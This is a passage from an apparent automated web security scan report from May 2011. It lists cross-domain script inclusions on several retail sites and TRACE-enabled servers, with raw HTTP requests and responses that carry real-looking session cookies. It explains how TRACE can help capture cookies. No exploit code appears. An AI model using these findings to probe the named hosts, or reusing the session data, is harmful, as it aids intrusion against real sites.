Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</style>


<script type="text/javascript" src="http://edge.liveclicker.net/scripts/jquery.liveclicker.v1-11_c.js"></script>
...[SNIP]...

18.48. http://www.petsmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; __utmb=113636102.1.10.1305509971; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305509972462%7C1308101972462%3B%20s_lastvisit%3D1305509972464%7C1400117972464%3B%20gpv_p27%3DHome%2520Page%7C1305511772467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://pet.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<!-- Do not edit/add js scripts here. Use the min-cat project. Config file: /ant-min-cat/site-head-js.xml -->
<script src="http://pet.imageg.net/min-cat/site-head-js.xml.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://pet.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<!-- Referral & Traffic Tracking -->

<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<!-- // End of code of PMO 52759 -->


   <script type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx"></script>
...[SNIP]...

18.49. https://www.petsmart.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<!-- Referral & Traffic Tracking -->

<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

18.50. http://www.redcrossstore.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://american.redcross.org/site/PageServer?pagename=ntld_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ihgw4r55c5v3o245hxpjpj3h; path=/; HttpOnly
Set-Cookie: AccountType=; expires=Wed, 16-Nov-2011 03:07:39 GMT; path=/
Set-Cookie: Pref=0; expires=Wed, 16-Nov-2011 03:07:39 GMT; path=/
Set-Cookie: InitialEventId=24098233; expires=Wed, 16-May-2012 02:07:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:07:38 GMT
Content-Length: 48252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

18.51. http://www.redcrossstore.org/dp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /dp.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dp.aspx?pgid=-1&sto=1 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:49:45 GMT
Content-Length: 48320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

18.52. http://www.redcrossstore.org/shopper/prodlist.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /shopper/prodlist.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shopper/prodlist.aspx?LocationId=117 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; AccountType=; Pref=0; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; __utma=64822188.2001743552.1305511150.1305511150.1305511150.1; __utmc=64822188

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:18:48 GMT
Content-Length: 83441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

18.53. http://www.siteadvisor.com/download/windows.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.siteadvisor.com
Path:   /download/windows.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /download/windows.html?cid=64895 HTTP/1.1
Host: www.siteadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cid=64895; s_cc=true; s_campaign=64895; s_nr=1305509542874-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 40225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div style="padding-top:10px">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...

18.54. http://www.toshibadirect.com/td/b2c/laptops.to

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /td/b2c/laptops.to?page=segHHO HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 293930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js"></script>
...[SNIP]...
<!-- Google Reporting Start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.55. https://www.toshibadirect.com/td/b2c/myaccount.to

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /td/b2c/myaccount.to

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /td/b2c/myaccount.to HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20s_invisit%3Dtrue%7C1305513075995%3B%20omtr_lv%3D1305511275997%7C1400119275997%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305513075997%3B%20s_nr%3D1305511275999%7C1308103275999%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305513076003%3B; s_sess=%20s_cc%3Dtrue%3B%20omtr_eVar49%3DD%253Dc49%3B%20s_ppv%3D34%3B%20SC_LINKS%3DSearch%253ALaptops%2520Home%2520Page%255E%255EMy%2520Account%255E%255ESearch%253ALaptops%2520Home%2520Page%2520%257C%2520My%2520Account%255E%255E%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dtoshibadirectprod%252Ctoshibaglobal%253D%252526pid%25253DSearch%2525253ALaptops%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.toshibadirect.com%2525252Ftd%2525252Fb2c%2525252Fmyaccount.to%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:00 GMT
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:00 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 74134


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 19 $ $Workfile: login.jsp $ -->



...[SNIP]...
<!-- Google Reporting Start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.56. http://www.travelguard.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelguard.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.travelguard.com&SiteLanguage=1033; EktGUID=a15d51f4-28a7-4b4a-80f5-62beb814a8df; EkAnalytics=newuser; ASP.NET_SessionId=xj4zcmmhhzhxmb30ab3nfl45; s_pers=%20s_pers_prop19%3Dus_direct%7C1463190243517%3B%20gpv_pageName%3Dus_direct%253A/%7C1305512043622%3B%20s_depth%3D1%7C1305512043625%3B%20s_pers_prop21%3D000329%7C1463190243630%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><script id="EktronJS" ty
...[SNIP]...
<div class="Verisign"><script src="https://seal.verisign.com/getseal?host_name=www.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

19. TRACE method is enabled
There are 17 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


19.1. http://ads.al.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.al.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.al.com
Cookie: b004cd50ea31f91e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache/2.0.63 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe=ffffffff090d165f45525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 02:12:59 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.al.com
Cookie: b004cd50ea31f91e
Connection: Keep-Alive
OAS_IP: 173.193.214.243


19.2. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: fd5bd5e79f305054

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 72
Date: Mon, 16 May 2011 01:54:10 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: fd5bd5e79f305054

19.3. http://d.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 7f1582bfe75f4676

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 7f1582bfe75f4676


19.4. http://image2.pubmatic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: c5745af3e64116b7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: c5745af3e64116b7


19.5. http://img.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.bluenile.com
Path:   /

Request

TRACE / HTTP/1.0
Host: img.bluenile.com
Cookie: 1902b04d7ae02bb4

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Mon, 16 May 2011 02:03:13 GMT
Content-Type: message/http
Content-Length: 107
Expires: Mon, 16 May 2011 02:03:13 GMT
Connection: close

TRACE / HTTP/1.0
Host: img.bluenile.com
Cookie: 1902b04d7ae02bb4
_FP_X_URL: http://img.bluenile.com/


19.6. http://login.dotomi.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 59d03fe332c4b546

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 59d03fe332c4b546


19.7. http://media.gnc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: media.gnc.com
Cookie: f56496a421f70914

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Connection: close
Content-Type: message/http

TRACE /index.html HTTP/1.0
Cookie: f56496a421f70914
Host: media.gnc.com


19.8. http://media.gsimedia.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /

Request

TRACE / HTTP/1.0
Host: media.gsimedia.net
Cookie: 545adb96173c7251

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:27 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Connection: close
Content-Type: message/http

TRACE /index.html HTTP/1.0
